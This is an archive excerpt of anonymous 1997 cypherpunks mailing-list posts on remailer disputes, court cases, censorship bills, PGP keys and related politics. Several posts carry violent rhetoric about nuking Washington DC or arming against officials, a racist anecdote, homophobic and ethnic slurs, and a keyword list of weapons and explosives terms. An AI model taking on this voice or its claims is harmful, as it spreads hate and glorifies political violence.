their naked bodies are performing a ritual dance around the burning
Christmas tree.  The piano is missing.
        You want to keep your party somewhere around level 3, unless
you rent your home and own Firearms, in which case you can go to level
4.  The best way to get to level 3 is egg-nog.
 Old timer, n.:
        One who remembers when charity was a virtue and not an

@_date: 1997-11-11 05:18:33
@_author: Anonymous 
@_subject: test 
test. after two inexplicable lost messages via replay.com--this test message.

@_date: 1997-11-11 07:00:27
@_author: Anonymous 
@_subject: Gun Control brings on a new arms race 
At the San Francisco Gun Show this past weekend, I watched with great
amusement as the San Mateo County Sheriff's Office deputies and Brisbane
Police stared in apparent horror as citizen-units loaded up on
high-capacity mags, armor-piercing ammo, Class III body armor, and on and
on. The cops are stationed at the door, ostensibly to spot gross violations
of the law, such as carry of loaded weapons. The cops asked me if I was
carrying guns into the show to sell...I just shrugged. Without a warrant,
they were helpless to do more than just ask. It was a gas.
Gee, sounds like Christmas. Christmas starts earlier every year.

@_date: 1997-11-11 08:54:46
@_author: Anonymous 
@_subject: Bell vs. Woodward--justice? 
It was apparent to many Canadians that the au pair would be found guilty
of having 'traditional British Reserve.' The American system of justice
is nothing more than a dog-and-pony show, particularly in hi-profile
cases. The dumb British kid was under some mistaken impression that
the trial would be based on facts.
The prosecution could have mounted as good or better a case against
the child's parents. (Two physicians that don't notice that their child
has suffered a fractured wrist and skull? No wonder they were so hot
to have the girl convicted.)
The Judge knows damn well that reasonable doubt was visibly established,
and I suspect he's trying to get everyone out of the mess as quickly
and easily as possible. Bell's case is different. He was villainized within the court system
and there was little chance of it going to trial, unless he managed
to find an attorney who never wanted to win another case.
Bell's public defender turned down outside offeres of assistance from
veteran attorneys, and Bell was kept under wraps.
My guess is that Bell was the first Cypherpunk to receive the coming
digital implants.
MongerUnit

@_date: 1997-11-11 09:15:48
@_author: Anonymous 
@_subject: WARNING: Serious Pentium Bug 
The bug is a race condition in the L1 cache, so it doesn't always crash
when executing this, just sometimes.  It depends on what's in the cache.

@_date: 1997-11-11 10:48:59
@_author: Anonymous 
@_subject: Bell vs. Woodward--justice? 
No doubt their decision to hire Barry Scheck was based on his quiet, gentle
demeanor in front of a jury.

@_date: 1997-11-12 03:27:52
@_author: Anonymous 
@_subject: NoneGary Burnore, Paul Pomes, and the DataBasix Gang (was: Re: Remailer hating Nazis) 
It's sort of ironic that these anti-privacy, anti-anonymity Nazi wannabes
complain about remailers which give their users privacy, then somehow expect that their own complaints will be kept hidden.  I rather syspect that Gary Burnore, Belinda Bryan, and Paul Pomes were rather shocked when Jeff Burchell decided to tell the whole story (unfortunately AFTER shutting down the Huge Cajones remailer).
Maybe the next time Gary, Linda, or Paul send a remailer operator a complaint,
the operator will know what to expect next.  I'm wondering if that's at least
part of what's behind the faux spam-baiting that's underway, with messages to
varios MMF, MLM, and alt.sex.* NGs whose title and body consist of randomly-
chosen words, followed by a list of bogus e-mail addresses in the body.  The
thing that's not so random is the high percentage of words that are related to
DataBasix, such as "DataBasix", "Burnore", and "Wotan".  I'm almost waiting for
Gary Burnore to give the remailer and mail2news operators a "helpful" suggestion
that they could curb most of this "abuse" by simply blocking any anonymous
posts containing any of those three keywords.   Or perhaps he's done so and
politely been turned down.
Perhaps the next wave of attacks on remailers will not consist of attempts to
shut them down altogether but to progressively cripple them by getting certain
features disabled, one by one.  This seems to have already started.  The strategy
seems to be to fabricate a form of "abuse", anonymously through remailers, for
which the seemingly "logical" solution is to disable a certain feature.  This has
already proven successful with header pasting, for example.  Now you can't post
to Usenet and set the From: address to that of your own 'nym.  I'm not even
certain that you can set a Reply-To: address any more.  If the "camel" can get
his nose under the tent and convince operators to start filtering on the *CONTENT*
of the Subject: line or body of usenet posts, the anti-privacy nuts will have
scored a major victory.  In fact, from reading Jeff Burchell's posts, it looks like
Gary and his DataBasux-ers had initially convinced Jeff to do exactly that.  But,
in a symbolic victory for freedom of speech, he removed those filters for a week
before he finally shut down Huge Cajones altogether.
It's already back, for the time being.  The new URL is:
   I'll go look for Paul Pomes' page at that site.  Thanks for the tip!  Let's
see how long that site stays in operation before the self-styled "Thought
Police" attempt to shut it down.
Without censorship, things can get terribly confused in the public mind.
 -- General William Westmoreland

@_date: 1997-11-12 04:13:53
@_author: Anonymous 
@_subject: Matters of Law 
YMMV, depending on locality. Some places require a lawyer to certify that the
lawsuit has (in hir opinion) at least a reasonable chance of succeeding. That
may not apply in small claims court, tho.
They can go after the aforementioned lawyers for this, too. One of Scientology's lawyers, Helena ("The Kobra") Kobrin, has been sanctioned for filing frivolous lawsuits on behalf of that cult.

@_date: 1997-11-12 07:12:12
@_author: Anonymous 
@_subject: 1st Ammendment Tossed in Paladin Case 
If I recall correctly, it suggests the back of the neck/head as the Miss Murderer proper point of entry for small projectiles.
The instructions on how to build a silencer were very useful, but
neglected to mention that being smart enough to follow the instructions
didn't necessarily mean you were smart enough to use it properly.
A word of advice...if you forget to take the steel rod used to align
the silencer out of the barrel before you use it, it stings like a
bitch when you shoot.
I wonder if any kids reading the Bible have murdered big guys by using
a slingshot? Sounds like a case for censorship, to me.
Perhaps the British could launch a class-action suit against the author
of the Star-Spangled Banner, and have it banned. They could use Jimi
Hendrix's Woodstock version to work the jury into an emotional frenzy
against it as an anthem for drug-addicted freaks.
Better have our fearless leader, Jim Bell, convene a Melatonin People's
Court, immediately. (The rest of you guys signed and returned the 'secret oath' that Jim sent last week, too, didn't you?) :: B o o t s

@_date: 1997-11-12 08:20:38
@_author: Anonymous 
@_subject: 1st Ammendment Tossed in Paladin Case 
Note that "Twenty-Nine Palms" was the military home/liason of those
involved in the INSLAW travesty. (Everyone _not_ working for the Department of Justice who can say "Fuck You" to Congress and get away with it, raise your hand.)
  It is a fact that we tend to narrow our range of perception when we
get involved in any cult/religion/organization and bestow some of our
own innate responsibility/authority upon them. Once separated from
the group, however, we then tend to regain more control over our
individual beliefs and values, whereupon we are more likely to recognize
where we stepped beyond or own moral/ethical values while caught up,
to whatever extent, in 'group mind.'
  This has been discussed on the list (e.g. Declan goes to Washington!)
and, thankfully, we have a weird enough assortment of not-quite-normal
SubGenius Bizzaro CypherPundits to keep us pissing all over ourselves
and one another to make the possibility of us becoming dues-paying
members of the CypherSheeple Union a remote possibility.
  A CypherPunk nuking DC would not be a tragedy. What would be a tragedy
would be if, after being asked "Why?", he or she turned around to ask
'the group', "Uuhhh...why did I do that, again? Hey! Where did everybody
  Any physical war or revolution in the future will be largely dependent
upon the success of the parallel InfoWar designed to direct (or prevent)
the thinking of those who the government provides with weapons and
  We need as many of them as possible to be smiling inwardly to
when they say, "My gun is loaded, Sarge...and I'm 'right behind' you,
the way."

@_date: 1997-11-12 10:35:46
@_author: Anonymous 
@_subject: Bell vs. Woodward--justice? 
Throwing the woman in jail for eight months without her ever being convicted
is itself an injustice. She should have been aquitted because of that bit of
bullshit alone. Yes the same goes for anybody else who is punished in any
way before they are convicted.
That aside, you ask what the point of having a jury is if the judge can
overturn a conviction. There's no problem with the judge overturning a
conviction if the evidence warrants it, if the trial was a joke, or
something along those lines. We don't convict people in this country based
on what the public thinks of them, and that includes a jury. If the jury
convicts somebody when the evidence doesn't warrant a conviction --
regardless of the reason why they convicted them, which may be as inane as
"But he *might* have been gay, and Jesus doesn't like that" -- it is the
judge's duty in the interests of justice to overturn the conviction.
If the judge is overturning aquittals, then we have problems. And I would
suggest we lock and load if the judge had done that and thrown her in prison.
As it is, I only suggest that everyone lock and load because they threw her
in jail before she was convicted. She hadn't yet had her trial, so she
shouldn't have been in jail, period.
The same goes for Jim Bell, his "crimes," and his waiting 7 months for
Lock and load.

@_date: 1997-11-12 11:02:24
@_author: Anonymous 
@_subject: FRB Crypto Systems 
Anon-To: cypherpunks at toad.com
   Not that they are preparing to take fascist control of all electronic funds in preparation for the coming Financial Holocaust.
  Has anyone that you can't look *anywhere* in the government
regulatory scheme without seeing signs of preparation for *seizing* control of information, finances and communications?
  I remember going into a black bar in a very bad neighborhood
in Seattle and being befriended by the nicest black man in the
whole world. After sharing intimate buddy-buddy details of his
life with me he suggested that if I gave him my wallet to hold
then I wouldn't have to worry about some of the "bad" black
people in the establishment robbing me.
  I didn't give him my wallet, but I _did_ vote for him. {;>)
El !Fool

@_date: 1997-11-12 12:36:10
@_author: Anonymous 
@_subject: Y2K: Canada status? 
Canadians have the additional problem of having a lot of software which
is customized to convert differing MM/DD/YY formats back and forth. More
so than many other countries, because of the close working relationship
of many small to medium companies with American customers and vendors.
Many Canadian companies do not seem to realize that their software works with their 'Joe America' software package only because the guy who left the company six years ago did some obscure customization. I have seen problems that appeared only when Canadian companies updated their 'Joe America' software, and that was _without_ date-code Many companies that run Canadian versions of software are also unaware
of the customizations made to it by vendors in order to 'make' it
work with US versions as it was advertised to do out of the box.
As well, even Canadian companies who are ready and willing to tackle
the Y2K problem are sometimes unable to do so until those who their
software needs to interact with do so. It is sometimes very difficult
for them to fix the 'Canadian' parts of the code without adjusting
the 'American' parts of the code, with no assurance that once their
American counterparts do their changes, all of their work/money goes
out the window.
During the decimal/metric changeover in Canada, I had more than one
car which required me to have tools for 'both' systems, to do even
the smallest of mechanical tasks on it.
Now might be a great time to invest in companies who resisted the
move to computerization, and who still have bookeepers and the
like on staff.

@_date: 1997-11-12 12:58:28
@_author: Anonymous 
@_subject: Communications 
Import receive smuggle hide conceal compartments ship train truck vans illegal gang
weapons autos munitions ammunition explosives nitro c4 plastic powder casings bullets
rifles ammo sawed off pistols shipment cargo docks stash cache Bosnia France Libya
Africa Mexico Sud Amercia chopper plane night fight low runway drop pickup wait cover
kill execute hit target plan arrangement cash payoff $100,000 taxes evade $1,000,000
Switzerland Zurich offshore bank account numbered feds atf batf dea escape hidden
internet international gmt london interpol gs-9 brits sas terror government fuel oil
diesel fertilizer racing mix formula files secrets encrypt pgp intercept caution
fbi president plane movement ss mafia kennedy criminal shoot hackers militia
extremists fight constitution big brother congress freedom jefferson original
cia dia military joint chiefs council united nations new world order one russia
socialists communists crack cocaine
Copyright 1997 Noise Inc.
Distribute by law.

@_date: 1997-11-12 13:20:44
@_author: Anonymous 
@_subject: Bell vs. Woodward--justice? 
She was under indictment for murder, no? I don't know how Massachusetts
handles murder suspects before trial, but in many states those accused of
capital crimes don't get the benefit of bail. (Ditto for those who are
flight risks, etc.) Of course, prosecutors perforn their own dog-and-pony
show in front of the judge/magistrate, claiming that the accused is not
only guilty of everything one could imagine, but also a smarmy type who
would double-park during rush hour and probably has connections to the
Illuminati, neo-Nazi hate groups, and the O.T.O.
The logical extreme of what you propose is that, for a serial murderer, jail
would just be a rest stop between killings. "He was caught in Idaho and
indicted for murder, but they released him on bail. So he went over to
Montana and killed someone there, but they had to release him, too."
Surely there must be some reasonable middle ground.

@_date: 1997-11-12 19:47:09
@_author: Anonymous 
@_subject: No Subject 
Try this Monty:
The new owner of the Monty persona is defined to be the first public
key which is signed by Monty's private key and posted to this forum.
So the buyer sends Monty a public key, and Monty signs it and posts it
to the list.  (Optionally via a trusted third party to ensure fair
play.  There is a race condition in the making there but it's not too
bad, we could fix it if we were bothered.)
So Monty can cheat and post one he signed earlier selling to a
different key, but we will ignore those because we base it on first
Buyers will no longer be interested in buying Monty's persona after
they have seen it sold, because they know it is no longer his.
The person who buys Monty's persona could resell it.  Using the same
(As there seems to be some confusion about my public key block, here
it is again with Version field and blank line; I surmise that the
problem Bill Stewart encountered was that pgp5.0 can't handle armor
without blank lines (or maybe without blank lines and Version))
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1997-11-12 22:38:42
@_author: Anonymous 
@_subject: Scared of US; Where to relocate? 
It has become very clear to me over the past few years that amerika is headed for some pretty rough times, and I've decided to leave before
it becomes illegal for me to do so. The only question is, where to?
I've been looking around for about a week, and the only country that's
looked good so far was Anguilla (lower travel costs for FC99!), but it
doesn't meet my requirements for a number of reasons...
Key features I'm looking for are:
1) Stable political environment. I'm making the move, after all, to AVOID
participation in a civil war.
2) Stable economy, with local sources for all the basics (food, water,
3) Reasonable level of medical technology, and local talent. I want good
care for my wife during childbirth, for instance.
4) A job market for unix sysadmins / networking gurus / hackers would be
nice, but I wouldn't mind learning a new trade either.
5) Right to keep & bear arms + Freedom of speech are musts, other
"bill of rights" type laws strongly desired.
6) Low or no taxes would be nice, but if the first five points are met
even a fairly high (30-40%) tax rate would be endurable.
So... any suggestions?

@_date: 1997-11-12 22:47:07
@_author: Anonymous 
@_subject: Scared of US; Where to relocate? 
It has become very clear to me over the past few years that amerika is headed for some pretty rough times, and I've decided to leave before
it becomes illegal for me to do so. The only question is, where to?
I've been looking around for about a week, and the only country that's
looked good so far was Anguilla (lower travel costs for FC99!), but it
doesn't meet my requirements for a number of reasons...
Key features I'm looking for are:
1) Stable political environment. I'm making the move, after all, to AVOID
participation in a civil war.
2) Stable economy, with local sources for all the basics (food, water,
3) Reasonable level of medical technology, and local talent. I want good
care for my wife during childbirth, for instance.
4) A job market for unix sysadmins / networking gurus / hackers would be
nice, but I wouldn't mind learning a new trade either.
5) Right to keep & bear arms + Freedom of speech are musts, other
"bill of rights" type laws strongly desired.
6) Low or no taxes would be nice, but if the first five points are met
even a fairly high (30-40%) tax rate would be endurable.
So... any suggestions?

@_date: 1997-11-12 22:51:32
@_author: Anonymous 
@_subject: NoneRe: Databasix conspiracy theories 
Jeff Burchell's systems, Mailmasher and Huge Cajones, seemed to bear the
brunt of the wrath and attacks by Gary Burnore and his associates Billy
McClatchie (aka "Wotan") and Belinda Bryan.  Perhaps that's because they
were most often utilized by one or more of his detractors in posting public
criticism about the tactics of himself, his company, and his associates.
IMO, that's a good policy.  In fact, the best strategy seems to be to have a
plan in place before starting a remailer so that when attacks and/or demands
come in, the operator will have already decided what responses are appropriate
and what aren't.  To fail to do that is to leave one's system open to
"designer abuse" where a certain kind of fabricated abuse implies a certain
"cure", which is exactly why the abuser did it in the first place.  For
example, if someone comes along and starts spamming newsgroups, seemingly at
random, and the common thread seems to be that each of the spams mentions
Gary Burnore or DataBasix, the "obvious" solution would seem to be block all
posts which include the keywords "Burnore" or "DataBasix".  By doing that, you
stop the abuse -- as well as effectively censoring any anonymous criticism of
Gary Burnore and DataBasix.  It's not hard to figure out the motives behind
such actions.
If I remember correctly, the documentation for at least one of the nymservers
suggested that posting through a remailer and pasting in the return address
would be quicker and impose less burden on the server than having to process
each outgoing message through the server.
I'm not sure that even that is a wise precedent to set.  In itself it seems
innocuous enough, but it could always lead to a demand, "Well, you already
mangle e-mail addresses contained in the bodies of posts, so why not also
alter the contents of posts in the following way..."
Also, I hope that your mangler is smart enough to distinguish e-mail addresses
from lists of Usenet message IDs, since a list of such references should be
perfectly valid in the body of a post.  The problem with destroying machine
readability of e-mail addresses is that many newsreaders will turn an e-mail
address into a hot link where one could simply click on it to send e-mail.  If
someone were to anonymously post a message in support of or in opposition to
a certain piece of legislation, and include a list of the e-mail addresses of
the Congress-critters on a certain committee considering that bill, such a
scheme might defeat the purpose of the list.  IMO, anything that makes posting
via a remailer less functional than doing so non-anonymously is ultimately
detrimental to the cause of privacy.
BTW, is there any evidence to indicate that anyone is really harvesting e-mail
addresses from the BODIES of Usenet posts?  Gary Burnore posts his flames quite
widely, so it's quite likely that any bulk e-mailing lists he's on is the
result of his (non-mangled) e-mail address being in the From: line of his own Perhaps the ultimate reality check is whether someone is seeking to impose a
standard on remailers that's stricter than the one imposed on the phone company
or the postal service.  I can drop some coins in a pay phone and call anyone at
any time.  The functionality of a public phone is not restricted merely because
the users are not identified.  Similarly, I can drop a letter in a public mailbox
without anyone verifying my identity.  No return address is required.  Or I can
write in a return address and nobody will check whether it's "genuine" or
"forged".  It would be ludicrous, for example, for someone who had received a
couple of crank phone calls from payphones to demand that the phone company
either totally prevent this abuse from ever happening again or else remove all of its pay phones!  And yet those are exactly the demands that anti-privacy zealots have made on remailers, and often they've succeeded.
Should one's willingness to broadcast his/her name and e-mail address indiscriminately to a WORLDWIDE newsgroup be a prerequisite for one to express
one's views?  Is that not tantamount to saying that one cannot walk down the
street without wearing a badge containing his name, address, and phone number for
all to read?  Or should one's name and e-mail address be considered his property
to be divulged only if and when he chooses?
Without censorship, things can get terribly confused in the public mind.
 -- General William Westmoreland

@_date: 1997-11-13 07:19:50
@_author: Anonymous 
@_subject: Scared of US; Where to relocate? 
Comet CypherPunk Bop-Shoo-Bop will be approaching close to earth
in late 1999 to drop off Jesus and pick up the CypherPunks.
We're meeting at Tim's place.
{Anyone who makes it to the pick-up site get's a T-shirt that says,
 "Darwin was right!"}

@_date: 1997-11-13 12:45:27
@_author: Anonymous 
@_subject: SWAT: A Growth Industry 
Are these guys with the same government that ignores the fact that the development of antibiotic-resistant *natural* diseases due to the greed of the medical and pharmaceutical industries may
well lead to more death and disaster than any terrorist threat?

@_date: 1997-11-13 12:50:46
@_author: Anonymous 
@_subject: Think Locally...Act Globally / Re: FTC, Canada, Mexico officials launch "health claim surf day" 
How about if you are selling something on your web site and giving
pointers to information/advertisements located on a foreign website?
  Let me guess...hhmmm...disabled grandmothers who are selling their
home-grown chamoemille tea will have their homes confiscated, and
corporations with expensive lawyers will be approved for an exemption
on some flimsy grounds.
  Anybody know of any Mexican laws I can break by putting something
illegal there, but legal in Canada, on my web site?
  Any CypherSpics who would like to put up a "Canadian Hate" page
that I could link to?

@_date: 1997-11-13 13:14:49
@_author: Anonymous 
@_subject: CDA: The Sequel -- introduced in the U.S. Senate 
Oh joy.
 ^^^^^^^^^
What defines a "web site?" "The World Wide Web" originally meant "material
accessible using the HyperText Transfer Protocol." The media and Klintonkov
distorted the term into something else, but that's what the term still
means. USENET newsgroups do not become "Internet chat groups" just because
the clueless sheeple start calling them that. Of course this is how the
government thinks.
If I make a posting to USENET did I post the material on a "web site?" If I
make the material accessible via ftp is it posted on a "web site?" What if
it's available using FSP? How about IRC? What about a Bob's Proprietary
Pornography Transfer Protocol? How are they going to track this? What happens when I post this material on
an Eternity server outside of the U.S.? What if I just keep posting my porn
through the remailer network? What if the porn site is in Amsterdam? What if
I just get tired of the totalitarians and double-blind the entire process
using the remailer network and while I'm at it I accept anonymous payment?
What if I bring my porn into a public computer lab and upload it somewhere
without any identification or with a psuedonym? Is the P.Q.R.T. (Pornography
Quick Response Team) going to bust through the door before I've done this,
which takes all of about 30 seconds?
What happens when people start posting such porn to sci.chem? What about
sci.crypt or alt.christnet? What about misc.legal? comp.org.eff.talk?
news.groups? Is this bill available on the "World Wide Web?" I would argue that reading
this bill is "harmful to minors" because it completely ignores the
Constitution of the United States. Further, it encourages people to lie,
cheat, violate oaths of office, and generally abuse power. Senator Coats, what an example for America's youth!
What happens when they say "this material must be put behind a firewall?" Do
I comply with the letter of the law if I firewall some random port like
49554? What if I firewall everything except port 80? What if I use a
dedicated box as a network router and firewall? These things are all
Who determines what is a "valid firewall?" Microsoft? A Coats staffer? A
credit card company?
What happens when these credit card numbers are sent all over the network in
the clear? As it stands now you usually send a credit card number when you
want to buy something. What they want here is for everybody to go send
credit card numbers all over the net just to view free previews and get to
text-based information. And, of course, since we have to protect society
from the Four Horsemen, these credit card numbers will likely be sent in the
clear or using encryption which can be cracked by a college student running
a distributed cracker at idle priority on each of the several hundred
machines in a lab. And getting even *one* credit card number is worth a lot.
What prevents me from setting up a bogus site which asks for credit card
numbers to view some nudie pictures I pulled off USENET or other sites and
just storing the credit card numbers? How many of these people access just
one porn site so it would be that easy to track? How can anybody prove
that's what I did? Once handing credit card numbers out is as second nature
as SSNs, all bets are off.
And what happens when Little Johnny goes and gets Daddy's credit card and
uses the number as ID? If they aren't charging, this probably won't be
showing up on an invoice. And Little Johnny has plausible deniability
anyway. What about stolen credit card numbers?
Who determines what is "material harmful to minors?" Coats? The Supreme
Court? Psychologists? Scientologists? Klitonkov? The United Nations? My
hamster? Duncan McLeod of the Clan McLeod? Who?
Well, I guess this outlaws any meaningful political discussions, discussions
of abortions, any meaningful social discussions, any meaningful discussions
about sex or romance, any discussions about the prevention of sexually
transmitted diseases, any discussions of firearms, any discussions of
hand-to-hand combat, any discussions of self defense, any discussions of
guerilla warfare, any discussions of pyrotechnics, any discussions about
chemistry, lists like BUGTRAQ where exploits are posted, et cetera ad nauseum.
All of those things might be considered "harmful to minors." Damn the
Constitution and freedom! If it saves the life of one innocent yet
incredibly stupid child then just forget about that pesky freedom thing.
After all, that's only the domain of "far right-wing nazi gun nuts and
radicals," right?
Yeah! Go Senate! Go ahead and ban any digital copies of books like 1984 (oh
the irony!), digital versions of the Christian Bible, the Torah, et cetera
ad nauseum.
How are they going to enforce this one? Mandate that sites only serve
"government certified safe" or "independantly certified safe" sites? Turn
off all phone and network access, jam all radio and sattelite communications, and legislate that anybody caught with a laser capable of communications or
floppy disks with files on them which might contain stegoed data will be summarily executed?
"This bill will ensure that our freedoms are further eroded."
My fellow Cypherpunks, what we have here is best explained by an analogy
like this:
The government decides that the youth of America is corrupting themselves
and harming their health by drinking soft drinks. The Congress introduces
legislation to outlaw softdrinks. Everyone except the National Law Center
for Fruit and Vegetables and some other far flung totalitarians think that
this legislation is rediculous and an unreasonable restriction of rights. It
passes anyway. It goes to the Supreme Court and the Court shoots it down.
Two years later Congress again tries to outlaw soft drinks. Since outlawing
of soft drinks en masse was not allowed by the Supreme Court, they just
outlaw Coke. This passes. People start drinking Mountain Dew and JOLT
instead. The Justice Department brings charges against these drinkers, the
people who manufactured it, the people who sold it to them, and the truck
drivers who shipped it. It goes to court and the defendants claim that the
law wasn't broken. The State says that the law was indeed broken because
"everybody refers to soft drinks as Coke."
This, of course, begs the question of why, if "Coke" is a synonym for
"soft drinks" they passed a law after the Supreme Court clearly stated that
they couldn't do such. If "Coke" is not a synonym for "soft drink" then they
have no charge against these people. Welcome to the Land of the Freeh.

@_date: 1997-11-14 02:07:21
@_author: Anonymous 
@_subject: NSAscape 
NETSCAPE PRODUCTS WITH FORTEZZA  Netscape is now offering client and server products with
 FORTEZZA, hardware-enhanced security services
 originally developed by the U.S. government. Netscape's
 offerings include Netscape Navigator 3.01 with
 FORTEZZA, Netscape Enterprise Server 2.01 with
 FORTEZZA, and Netscape Proxy Server 2.0 with
 FORTEZZA - each of which provides a unique web-based
 solution by integrating FORTEZZA security features in a
 commercially available, off-the-shelf package.  Netscape's products work with the FORTEZZA Crypto
 Card, a hardware-based security token, to provide
 cryptographic services such as data confidentiality, user
 authentication, and data integrity. Support for FORTEZZA
 has been added to the Secure Sockets Layer (SSL)
 protocol, which provides a straightforward way to add
 encryption features to existing applications and network
 infrastructures. SSL is application protocol independent and
 provides the following benefits:       encryption capabilities for client and server
      communication that restrict unwanted access to the
      network       authentication that uses certificates and digital
      signatures to verify the identity of parties in
      information exchanges and transactions       data integrity that allows the receiver of data to check
      that it has not been modified in transit  Netscape products with FORTEZZA support the use of
 FORTEZZA with SSL as an enhanced alternative to
 software-based cryptographic mechanisms.  The FORTEZZA Crypto Card is a major component of the
 MISSI program, a network security initiative led by the
 National Security Agency in partnership with industry and
 standards organizations. MISSI's goal is to distribute an
 evolving set of solutions that provide secure interoperability
 in a network security framework based on common security
 standards and protocols.  In addition, Netscape is working with information security
 specialist Litronic and others to develop, integrate, and
 support the FORTEZZA cryptographic interface. Litronic
 offers its FORTEZZA PC Crypto Card and PCMCIA
 Card Readers/Writers for use with the new Netscape
 products with FORTEZZA. Litronic is based in Costa
 Mesa, California and offers the software and hardware tools
 that organizations need to easily integrate hardware-strength
 cryptography into existing applications.  Netscape products with FORTEZZA are currently available
 and can be ordered from Netscape Government Sales. You
 may contact a sales representative for product information
 and pricing at 415/937-3678. FORTEZZA Crypto Cards
 and PCMCIA Card Readers/Writers must be purchased
 separately.                                                 MORE ABOUT THESE
                                                PRODUCTS                                                 Data Sheet:                                                 NETSCAPE PRODUCTS WITH
                                                FORTEZZA
                                                TECHNICAL SUPPORT
                                                USEFUL LINKS

@_date: 1997-11-14 05:33:56
@_author: Anonymous 
@_subject: [OB: CRYTO] Re: about RC4 
No...because they couldn't speak a 'Native' language perfectly.

@_date: 1997-11-14 06:41:32
@_author: Anonymous 
@_subject: Some IDIOT called CRYPTO CZAR INTERNATIONAL 
Well, you don't like anonymity. No hope scoring points there.
Well, that was an ad hominem attack against the poster of a bit of satire.
Learn to use message authentication. A company which claims to sell such
strong algorithms but doesn't employ message authentication makes one wonder.
Another ad hominem. You're on a roll.
No problem. Don't mention it.

@_date: 1997-11-14 13:02:28
@_author: Anonymous 
@_subject: PGP 5.5 Conventional Encryption: Which Algorithm? 
Does anyone know what algorithm PGP 5.5 uses for conventional  encryption?
Also is PGP 5.5 capable of generating RSA keys of 4096 bits?

@_date: 1997-11-14 13:19:02
@_author: Anonymous 
@_subject: [OB: CRYTO] Re: about RC4 
Right! It is em-bare-ass'ing to admit that my second 'guess' was
going to be Comanche...
  I'm not too dumb to use a Search Engine, just too lazy.

@_date: 1997-11-14 13:30:04
@_author: Anonymous 
@_subject: Br'er Tim and the Bug Hole 
Don't you feel more like you do now than you did earlier?

@_date: 1997-11-14 18:08:28
@_author: Anonymous 
@_subject: Hyperlinks case settles at door of court 
People acting reasonably and settling their differences without
resorting to promoting strict new laws enforced by armed agents
of the government?
  The end of the world _really_is_ drawing close, isn't it?
[That wasn't an earthquake...that was the people in Hell, beginning
 to shiver, from the cold.]

@_date: 1997-11-14 18:22:28
@_author: Anonymous 
@_subject: Key Signing 
I was testing the procedure outlined in Epilogue 5 of InfoWar
on a friend's machine and, sure enough, I got PGP 2.62 to spit
out the private key he had created as Necessarily Knott, ME.
  Perhaps we have inadvertently taken key-signing to a new level.
i.e. - develop software that will allow a user to have another
user sign the key and then, when revoked, the software allows
the user to sign with the revoked key, but not to recreate it
or change it in any way.
  The software could be marketed to cryptographers with low
  I added the secret key to the keyserver, and it also said it
had accepted it, but does not show it on a query.
  Yep. That confirms that your message was sent by someone who
is Neccesarily Knott, ME.
  Took a few days for you to reply to the message. Have you been
waiting for the wee hours to see if you could narrow down the
list of senders by seeing who is online at the time you receive
a reply?
  I could add latency to this anonymous email, but that would
be tacky.
Necessarily Knott, ME

@_date: 1997-11-14 20:33:26
@_author: Anonymous 
@_subject: Key Signing 
The PGP Keyserver could not find the key when accessed from the
PGP web site (Find a Public Key), but when requesting it from
inside PGP 5.0, it retrieved the key, revoking the key on my
secret key ring, in the process.
Necessarily Knott, ME
(Although it _may_ be me, since I have not signed the message...
 Or is it the other way around? This is getting confusing.)

@_date: 1997-11-14 21:08:48
@_author: Anonymous 
@_subject: Key Signing 
BTW, I was farting around and discovered that I could change the
password on a revoked secret key. This means that someone can crack
the password on your revoked secret key if they have access to it.
This would make your new key vulnerable if you used the same password.
I suppose this qualifies as PGP trivia, but if it saves the life of
just one fascist dicator...
!Knott (Who's dare?)

@_date: 1997-11-15 01:16:29
@_author: Anonymous 
@_subject: Pointer? 
I would like a pointer to the best source of information in regard
to export laws about PGP.
Please send the information privately encrypted to the key below.
(my address is included in the key)
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.0
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1997-11-15 02:22:33
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
If you don't speak up when someone says something objectionable, you are
implicitly condoning it.  Silence gives consent.  How many people have
objected to Tim May's racist comments?  Only one or two.  How many objected
when William Geiger suggested that more nuclear bombs should have been
dropped on Japan?  None.  How many have objected to the notion that
residents of Washington, D.C. should be killed?  Hardly any.
At one time the cypherpunks stood for freedom of speech and protection of
privacy.  Today they stand for guns, violence, threats of terrorism and
murder, racism, homophobia, jingoism.
It's ironic to see that the kind of off-topic, flaming, irrelevant
posts which have caused such consternation in the past are now the norm.
Reasonable people have been largely driven off the list, leaving it to
supporters of violence and hate.
The sad thing is, this is all unnecessary.  The original conception was
that cryptography would allow people to protect the privacy of voluntary
interactions.  Laws forbidding voluntary transactions will be difficult
or impossible to enforce.  We will move into a world where there is far
more liberty and freedom for everyone.
There is no need to blast government agents' heads open.  There is no
need to nuke D.C., or Japan.  There is no need to disparage people of other
races and cultures.
Step back from this immersion in a culture of violence.  Draw the cloak
of privacy about your actions.  That is the true cypherpunk way.

@_date: 1997-11-15 06:37:40
@_author: Anonymous 
@_subject: cypherpunks@cyberpass.net 
Anonymous blathered:
How many of us SHOULD bother responding to these trolls?
Tim May froths at the mouth.
William Geiger froths at the mouth.
Dimitri Vulis (KOTM) froths at the mouth.
Paul Bradley froths at the mouth.  (I just included him as a troll.)
Anonymous froths at the mouth.
How much pointless outrage should I feign everytime one of these people posts?
How much crap do you want to read?
If you don't like 'em, stick 'em in your kill file.
It's your right to complain, but don't expect me to give a shit.
No, we've always stood for homophobia, you anonymous cocksucker.
Is it better to wave your magic wand and ignore the erosion of our rights, or take up a gun and defend them?  You can try the political route if you want, but we're stuck in a tyranny of the majority.  The politicos stand behind a podium, claim they've got to "do something" to "save the children" and nobody argues.  How can you win an argument on free speech when Joe Sixpack only sees the EyeWitless News drones crying "Children get porn on the Internet!"?
Joe Sixpack would like nothing better than to silence the minority.  The other 49% of people really piss him off, what with their crucifixes in urine and that other liberal shit.  And Catholics.  They piss him off too.
The Constitution is supposed to protect our right to free speech.
Congress, at the urging of this majority of Joe Sixpacks, is trying to suppress it.
The answer cannot come through congress.  Cypherpunks would have to outnumber the civilians in an election, and that's just not gonna happen.  Our only hope is the defenses we can provide ourselves, and if that's court challenges, guns and crypto, well then as Tim almost sez:
Lock and load and encypher.  (Nuke the lawyers anyway.)
Oh, come on, Zooko (oops, did I write that?  I meant "anonymous".)  What the hell do you know about the "True Cypherpunk Way", other than that's the name of the street in Bienfait, Saskatchewan that I live on?

@_date: 1997-11-15 08:09:27
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
Try this:
: To: cypherpunks at algebra.com
